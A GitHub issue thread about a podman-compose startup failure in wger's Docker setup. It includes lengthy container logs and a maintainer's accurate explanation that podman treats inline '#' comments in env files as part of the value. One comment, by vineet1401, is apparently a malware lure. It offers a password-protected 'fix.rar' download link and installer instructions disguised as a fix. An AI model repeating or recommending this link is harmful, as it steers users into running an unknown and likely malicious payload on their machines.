### ISSUE TITLE
ValueError: invalid literal for int() with base 10: '18000 # in seconds - 5*60*60, 5 hours'

### ISSUE THREAD

**Issue by TornaxO7** [wger-project/docker#97]
Hello!
After cloning and just changing the binding port of the `nginx` container, I'm getting the following error message after executing `podman-compose up`:
```
[web]           | ValueError: invalid literal for int() with base 10: '18000 # in seconds - 5*60*60, 5 hours'
```
I also got some other error messages. Here's the full output:

<details>

```
[cache]         | 1:C 26 Aug 2024 19:17:03.733 # WARNING Memory overcommit must be enabled! Without it, a background save or replication may fail under low memory condition. Being disabled, it can also cause failures without low memory condition, see https://github.com/jemalloc/jemalloc/issues/1328. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect.
[cache]         | 1:C 26 Aug 2024 19:17:03.733 * oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
[cache]         | 1:C 26 Aug 2024 19:17:03.733 * Redis version=7.2.5, bits=64, commit=00000000, modified=0, pid=1, just started
[cache]         | 1:C 26 Aug 2024 19:17:03.733 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf
[cache]         | 1:M 26 Aug 2024 19:17:03.733 * monotonic clock: POSIX clock_gettime
[cache]         | 1:M 26 Aug 2024 19:17:03.734 * Running mode=standalone, port=6379.
[cache]         | 1:M 26 Aug 2024 19:17:03.734 * Server initialized
[cache]         | 1:M 26 Aug 2024 19:17:03.734 * Loading RDB produced by version 7.2.5
[cache]         | 1:M 26 Aug 2024 19:17:03.734 * RDB age 21 seconds
[cache]         | 1:M 26 Aug 2024 19:17:03.734 * RDB memory usage when created 0.85 Mb
[cache]         | 1:M 26 Aug 2024 19:17:03.734 * Done loading RDB, keys loaded: 0, keys expired: 0.
[cache]         | 1:M 26 Aug 2024 19:17:03.734 * DB loaded from disk: 0.000 seconds
[cache]         | 1:M 26 Aug 2024 19:17:03.734 * Ready to accept connections tcp
[celery_worker] | Error: unable to start container 5e09422ce013af9b3ee11742986792eee488b560a9bc7828cff9282cba91a4a1: generating dependency graph for container 5e09422ce013af9b3ee11742986792eee488b560a9bc7828cff9282cba91a4a1: container 82c76b6325ab6ef50c85add56d0529d056c53d16723ada9f53b7de5fd9c2264a depends on container da7355e1be51c50a7f38500963fbd5166e10492daf737c183274c441739fd3aa not found in input list: no such container
[db]            |
[db]            | PostgreSQL Database directory appears to contain a database; Skipping initialization
[db]            |
[db]            | 2024-08-26 19:17:03.776 UTC [1] LOG:  starting PostgreSQL 15.8 on x86_64-pc-linux-musl, compiled by gcc (Alpine 13.2.1_git20240309) 13.2.1 20240309, 64-bit
[db]            | 2024-08-26 19:17:03.776 UTC [1] LOG:  listening on IPv4 address "0.0.0.0", port 5432
[db]            | 2024-08-26 19:17:03.776 UTC [1] LOG:  listening on IPv6 address "::", port 5432
[db]            | 2024-08-26 19:17:03.777 UTC [1] LOG:  listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432"
[db]            | 2024-08-26 19:17:03.780 UTC [24] LOG:  database system was shut down at 2024-08-26 19:16:42 UTC
[db]            | 2024-08-26 19:17:03.784 UTC [1] LOG:  database system is ready to accept connections
[celery_beat]   | Error: unable to start container 22ae279719a043d926f11e4a6c7a034a7d677cc1aa2fb46fe41cfbfee42684fc: generating dependency graph for container 22ae279719a043d926f11e4a6c7a034a7d677cc1aa2fb46fe41cfbfee42684fc: container 5e09422ce013af9b3ee11742986792eee488b560a9bc7828cff9282cba91a4a1 depends on container 82c76b6325ab6ef50c85add56d0529d056c53d16723ada9f53b7de5fd9c2264a not found in input list: no such container
[nginx]         | /docker-entrypoint.sh: /docker-entrypoint.d/ is not empty, will attempt to perform configuration
[nginx]         | /docker-entrypoint.sh: Looking for shell scripts in /docker-entrypoint.d/
[nginx]         | /docker-entrypoint.sh: Launching /docker-entrypoint.d/10-listen-on-ipv6-by-default.sh
[nginx]         | 10-listen-on-ipv6-by-default.sh: info: Getting the checksum of /etc/nginx/conf.d/default.conf
[nginx]         | 10-listen-on-ipv6-by-default.sh: info: /etc/nginx/conf.d/default.conf differs from the packaged version
[nginx]         | /docker-entrypoint.sh: Sourcing /docker-entrypoint.d/15-local-resolvers.envsh
[nginx]         | /docker-entrypoint.sh: Launching /docker-entrypoint.d/20-envsubst-on-templates.sh
[nginx]         | /docker-entrypoint.sh: Launching /docker-entrypoint.d/30-tune-worker-processes.sh
[nginx]         | /docker-entrypoint.sh: Configuration complete; ready for start up
[nginx]         | 2024/08/26 19:17:03 [notice] 1#1: using the "epoll" event method
[nginx]         | 2024/08/26 19:17:03 [notice] 1#1: nginx/1.26.2
[nginx]         | 2024/08/26 19:17:03 [notice] 1#1: built by gcc 12.2.0 (Debian 12.2.0-14)
[nginx]         | 2024/08/26 19:17:03 [notice] 1#1: OS: Linux 6.6.46
[nginx]         | 2024/08/26 19:17:03 [notice] 1#1: getrlimit(RLIMIT_NOFILE): 524288:524288
[nginx]         | 2024/08/26 19:17:03 [notice] 1#1: start worker processes
[nginx]         | 2024/08/26 19:17:03 [notice] 1#1: start worker process 23
[nginx]         | 2024/08/26 19:17:03 [notice] 1#1: start worker process 24
[nginx]         | 2024/08/26 19:17:03 [notice] 1#1: start worker process 25
[nginx]         | 2024/08/26 19:17:03 [notice] 1#1: start worker process 26
[nginx]         | 2024/08/26 19:17:03 [notice] 1#1: start worker process 27
[nginx]         | 2024/08/26 19:17:03 [notice] 1#1: start worker process 28
[web]           | Defaulting to user installation because normal site-packages is not writeable
[web]           | Obtaining file:///home/wger/src
[web]           |   Installing build dependencies: started
[web]           |   Installing build dependencies: finished with status 'done'
[web]           |   Checking if build backend supports build_editable: started
[web]           |   Checking if build backend supports build_editable: finished with status 'done'
[web]           |   Getting requirements to build editable: started
[web]           |   Getting requirements to build editable: finished with status 'done'
[web]           |   Installing backend dependencies: started
[web]           |   Installing backend dependencies: finished with status 'done'
[web]           |   Preparing editable metadata (pyproject.toml): started
[web]           |   Preparing editable metadata (pyproject.toml): finished with status 'done'
[web]           | Building wheels for collected packages: wger
[web]           |   Building editable for wger (pyproject.toml): started
[web]           |   Building editable for wger (pyproject.toml): finished with status 'done'
[web]           |   Created wheel for wger: filename=wger-2.3.0a2-py3-none-any.whl size=17240 sha256=99b2077ca80f648606558212037dfbbae7bd526be205de92e5ad8eb9453655d8
[web]           |   Stored in directory: /tmp/pip-ephem-wheel-cache-l_pzbit4/wheels/bb/de/68/a0b92a2822ee4f4e652bee9bccfb05e9a11dec0fbf14501163
[web]           | Successfully built wger
[web]           | Installing collected packages: wger
[web]           |   Attempting uninstall: wger
[web]           |     Found existing installation: wger 2.3.0a2
[web]           |     Uninstalling wger-2.3.0a2:
[web]           |       Successfully uninstalled wger-2.3.0a2
[web]           | Successfully installed wger-2.3.0a2
[web]           | Traceback (most recent call last):
[web]           |   File "/usr/local/bin/invoke", line 8, in <module>
[web]           |     sys.exit(program.run())
[web]           |   File "/usr/local/lib/python3.10/dist-packages/invoke/program.py", line 398, in run
[web]           |     self.execute()
[web]           |   File "/usr/local/lib/python3.10/dist-packages/invoke/program.py", line 583, in execute
[web]           |     executor.execute(*self.tasks)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/invoke/executor.py", line 140, in execute
[web]           |     result = call.task(*args, **call.kwargs)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/invoke/tasks.py", line 138, in __call__
[web]           |     result = self.body(*args, **kwargs)
[web]           |   File "/home/wger/src/wger/tasks.py", line 85, in bootstrap
[web]           |     setup_django_environment(settings_path)
[web]           |   File "/home/wger/src/wger/tasks.py", line 337, in setup_django_environment
[web]           |     django.setup()
[web]           |   File "/usr/local/lib/python3.10/dist-packages/django/__init__.py", line 19, in setup
[web]           |     configure_logging(settings.LOGGING_CONFIG, settings.LOGGING)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/django/conf/__init__.py", line 102, in __getattr__
[web]           |     self._setup(name)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/django/conf/__init__.py", line 89, in _setup
[web]           |     self._wrapped = Settings(settings_module)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/django/conf/__init__.py", line 217, in __init__
[web]           |     mod = importlib.import_module(self.SETTINGS_MODULE)
[web]           |   File "/usr/lib/python3.10/importlib/__init__.py", line 126, in import_module
[web]           |     return _bootstrap._gcd_import(name[level:], package, level)
[web]           |   File "<frozen importlib._bootstrap>", line 1050, in _gcd_import
[web]           |   File "<frozen importlib._bootstrap>", line 1027, in _find_and_load
[web]           |   File "<frozen importlib._bootstrap>", line 1006, in _find_and_load_unlocked
[web]           |   File "<frozen importlib._bootstrap>", line 688, in _load_unlocked
[web]           |   File "<frozen importlib._bootstrap_external>", line 883, in exec_module
[web]           |   File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
[web]           |   File "/home/wger/src/settings.py", line 95, in <module>
[web]           |     WGER_SETTINGS["EXERCISE_CACHE_TTL"] = env.int("EXERCISE_CACHE_TTL", 3600)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/environ/environ.py", line 237, in int
[web]           |     return self.get_value(var, cast=int, default=default)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/environ/environ.py", line 415, in get_value
[web]           |     value = self.parse_value(value, cast)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/environ/environ.py", line 474, in parse_value
[web]           |     value = cast(value)
[web]           | ValueError: invalid literal for int() with base 10: '18000 # in seconds - 5*60*60, 5 hours'
[web]           | Traceback (most recent call last):
[web]           |   File "/home/wger/.local/bin/wger", line 8, in <module>
[web]           |     sys.exit(main())
[web]           |   File "/home/wger/src/wger/__main__.py", line 40, in main
[web]           |     run(invoke_cmd + ' '.join(args), pty=True)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/invoke/__init__.py", line 50, in run
[web]           |     return Context().run(command, **kwargs)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/invoke/context.py", line 104, in run
[web]           |     return self._run(runner, command, **kwargs)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/invoke/context.py", line 113, in _run
[web]           |     return runner.run(command, **kwargs)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/invoke/runners.py", line 395, in run
[web]           |     return self._run_body(command, **kwargs)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/invoke/runners.py", line 451, in _run_body
[web]           |     return self.make_promise() if self._asynchronous else self._finish()
[web]           |   File "/usr/local/lib/python3.10/dist-packages/invoke/runners.py", line 518, in _finish
[web]           |     raise UnexpectedExit(result)
[web]           | invoke.exceptions.UnexpectedExit: Encountered a bad command exit code!
[web]           |
[web]           | Command: 'invoke bootstrap'
[web]           |
[web]           | Exit code: 1
[web]           |
[web]           | Stdout: already printed
[web]           |
[web]           | Stderr: n/a (PTYs have no stderr)
[web]           |
[web]           |
[web]           | Running in production mode, running collectstatic now
[web]           | Traceback (most recent call last):
[web]           |   File "/home/wger/src/manage.py", line 19, in <module>
[web]           |     setup_django_environment(get_path('settings.py'))
[web]           |   File "/home/wger/src/wger/tasks.py", line 337, in setup_django_environment
[web]           |     django.setup()
[web]           |   File "/usr/local/lib/python3.10/dist-packages/django/__init__.py", line 19, in setup
[web]           |     configure_logging(settings.LOGGING_CONFIG, settings.LOGGING)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/django/conf/__init__.py", line 102, in __getattr__
[web]           |     self._setup(name)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/django/conf/__init__.py", line 89, in _setup
[web]           |     self._wrapped = Settings(settings_module)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/django/conf/__init__.py", line 217, in __init__
[web]           |     mod = importlib.import_module(self.SETTINGS_MODULE)
[web]           |   File "/usr/lib/python3.10/importlib/__init__.py", line 126, in import_module
[web]           |     return _bootstrap._gcd_import(name[level:], package, level)
[web]           |   File "<frozen importlib._bootstrap>", line 1050, in _gcd_import
[web]           |   File "<frozen importlib._bootstrap>", line 1027, in _find_and_load
[web]           |   File "<frozen importlib._bootstrap>", line 1006, in _find_and_load_unlocked
[web]           |   File "<frozen importlib._bootstrap>", line 688, in _load_unlocked
[web]           |   File "<frozen importlib._bootstrap_external>", line 883, in exec_module
[web]           |   File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
[web]           |   File "/home/wger/src/settings.py", line 95, in <module>
[web]           |     WGER_SETTINGS["EXERCISE_CACHE_TTL"] = env.int("EXERCISE_CACHE_TTL", 3600)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/environ/environ.py", line 237, in int
[web]           |     return self.get_value(var, cast=int, default=default)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/environ/environ.py", line 415, in get_value
[web]           |     value = self.parse_value(value, cast)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/environ/environ.py", line 474, in parse_value
[web]           |     value = cast(value)
[web]           | ValueError: invalid literal for int() with base 10: '18000 # in seconds - 5*60*60, 5 hours'
[web]           | Traceback (most recent call last):
[web]           |   File "/home/wger/src/manage.py", line 19, in <module>
[web]           |     setup_django_environment(get_path('settings.py'))
[web]           |   File "/home/wger/src/wger/tasks.py", line 337, in setup_django_environment
[web]           |     django.setup()
[web]           |   File "/usr/local/lib/python3.10/dist-packages/django/__init__.py", line 19, in setup
[web]           |     configure_logging(settings.LOGGING_CONFIG, settings.LOGGING)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/django/conf/__init__.py", line 102, in __getattr__
[web]           |     self._setup(name)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/django/conf/__init__.py", line 89, in _setup
[web]           |     self._wrapped = Settings(settings_module)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/django/conf/__init__.py", line 217, in __init__
[web]           |     mod = importlib.import_module(self.SETTINGS_MODULE)
[web]           |   File "/usr/lib/python3.10/importlib/__init__.py", line 126, in import_module
[web]           |     return _bootstrap._gcd_import(name[level:], package, level)
[web]           |   File "<frozen importlib._bootstrap>", line 1050, in _gcd_import
[web]           |   File "<frozen importlib._bootstrap>", line 1027, in _find_and_load
[web]           |   File "<frozen importlib._bootstrap>", line 1006, in _find_and_load_unlocked
[web]           |   File "<frozen importlib._bootstrap>", line 688, in _load_unlocked
[web]           |   File "<frozen importlib._bootstrap_external>", line 883, in exec_module
[web]           |   File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
[web]           |   File "/home/wger/src/settings.py", line 95, in <module>
[web]           |     WGER_SETTINGS["EXERCISE_CACHE_TTL"] = env.int("EXERCISE_CACHE_TTL", 3600)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/environ/environ.py", line 237, in int
[web]           |     return self.get_value(var, cast=int, default=default)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/environ/environ.py", line 415, in get_value
[web]           |     value = self.parse_value(value, cast)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/environ/environ.py", line 474, in parse_value
[web]           |     value = cast(value)
[web]           | ValueError: invalid literal for int() with base 10: '18000 # in seconds - 5*60*60, 5 hours'
[web]           | Using gunicorn...
[web]           | [2024-08-26 19:17:08 +0000] [24] [INFO] Starting gunicorn 22.0.0
[web]           | [2024-08-26 19:17:08 +0000] [24] [INFO] Listening at: http://0.0.0.0:8000 (24)
[web]           | [2024-08-26 19:17:08 +0000] [24] [INFO] Using worker: sync
[web]           | [2024-08-26 19:17:08 +0000] [25] [INFO] Booting worker with pid: 25
[web]           | [2024-08-26 19:17:08 +0000] [25] [ERROR] Exception in worker process
[web]           | Traceback (most recent call last):
[web]           |   File "/usr/local/lib/python3.10/dist-packages/gunicorn/arbiter.py", line 609, in spawn_worker
[web]           |     worker.init_process()
[web]           |   File "/usr/local/lib/python3.10/dist-packages/gunicorn/workers/base.py", line 134, in init_process
[web]           |     self.load_wsgi()
[web]           |   File "/usr/local/lib/python3.10/dist-packages/gunicorn/workers/base.py", line 146, in load_wsgi
[web]           |     self.wsgi = self.app.wsgi()
[web]           |   File "/usr/local/lib/python3.10/dist-packages/gunicorn/app/base.py", line 67, in wsgi
[web]           |     self.callable = self.load()
[web]           |   File "/usr/local/lib/python3.10/dist-packages/gunicorn/app/wsgiapp.py", line 58, in load
[web]           |     return self.load_wsgiapp()
[web]           |   File "/usr/local/lib/python3.10/dist-packages/gunicorn/app/wsgiapp.py", line 48, in load_wsgiapp
[web]           |     return util.import_app(self.app_uri)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/gunicorn/util.py", line 371, in import_app
[web]           |     mod = importlib.import_module(module)
[web]           |   File "/usr/lib/python3.10/importlib/__init__.py", line 126, in import_module
[web]           |     return _bootstrap._gcd_import(name[level:], package, level)
[web]           |   File "<frozen importlib._bootstrap>", line 1050, in _gcd_import
[web]           |   File "<frozen importlib._bootstrap>", line 1027, in _find_and_load
[web]           |   File "<frozen importlib._bootstrap>", line 1006, in _find_and_load_unlocked
[web]           |   File "<frozen importlib._bootstrap>", line 688, in _load_unlocked
[web]           |   File "<frozen importlib._bootstrap_external>", line 883, in exec_module
[web]           |   File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
[web]           |   File "/home/wger/src/wger/wsgi.py", line 29, in <module>
[web]           |     application = get_wsgi_application()
[web]           |   File "/usr/local/lib/python3.10/dist-packages/django/core/wsgi.py", line 12, in get_wsgi_application
[web]           |     django.setup(set_prefix=False)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/django/__init__.py", line 19, in setup
[web]           |     configure_logging(settings.LOGGING_CONFIG, settings.LOGGING)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/django/conf/__init__.py", line 102, in __getattr__
[web]           |     self._setup(name)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/django/conf/__init__.py", line 89, in _setup
[web]           |     self._wrapped = Settings(settings_module)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/django/conf/__init__.py", line 217, in __init__
[web]           |     mod = importlib.import_module(self.SETTINGS_MODULE)
[web]           |   File "/usr/lib/python3.10/importlib/__init__.py", line 126, in import_module
[web]           |     return _bootstrap._gcd_import(name[level:], package, level)
[web]           |   File "<frozen importlib._bootstrap>", line 1050, in _gcd_import
[web]           |   File "<frozen importlib._bootstrap>", line 1027, in _find_and_load
[web]           |   File "<frozen importlib._bootstrap>", line 1006, in _find_and_load_unlocked
[web]           |   File "<frozen importlib._bootstrap>", line 688, in _load_unlocked
[web]           |   File "<frozen importlib._bootstrap_external>", line 883, in exec_module
[web]           |   File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
[web]           |   File "/home/wger/src/settings.py", line 95, in <module>
[web]           |     WGER_SETTINGS["EXERCISE_CACHE_TTL"] = env.int("EXERCISE_CACHE_TTL", 3600)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/environ/environ.py", line 237, in int
[web]           |     return self.get_value(var, cast=int, default=default)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/environ/environ.py", line 415, in get_value
[web]           |     value = self.parse_value(value, cast)
[web]           |   File "/usr/local/lib/python3.10/dist-packages/environ/environ.py", line 474, in parse_value
[web]           |     value = cast(value)
[web]           | ValueError: invalid literal for int() with base 10: '18000 # in seconds - 5*60*60, 5 hours'
[web]           | [2024-08-26 19:17:08 +0000] [25] [INFO] Worker exiting (pid: 25)
[web]           | [2024-08-26 19:17:08 +0000] [24] [ERROR] Worker (pid:25) exited with code 3
[web]           | [2024-08-26 19:17:08 +0000] [24] [ERROR] Shutting down: Master
[web]           | [2024-08-26 19:17:08 +0000] [24] [ERROR] Reason: Worker failed to boot.
```

</details>

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by rolandgeider** [comment]
Commenting here for future reference. The problem seems to be that podman doesn't parse the env file the same way docker does. In docker `FOO=BAR # comment` is read as `BAR` while podman seems to read out the complete line. In this case it's just enough if you remove everything after the `#` (and check all the other instances where there are inline comments as well) 

See e.g.  https://docs.docker.com/compose/environment-variables/variable-interpolation/#env-file-syntax

**Comment by TornaxO7** [comment]
Thank you for the information!
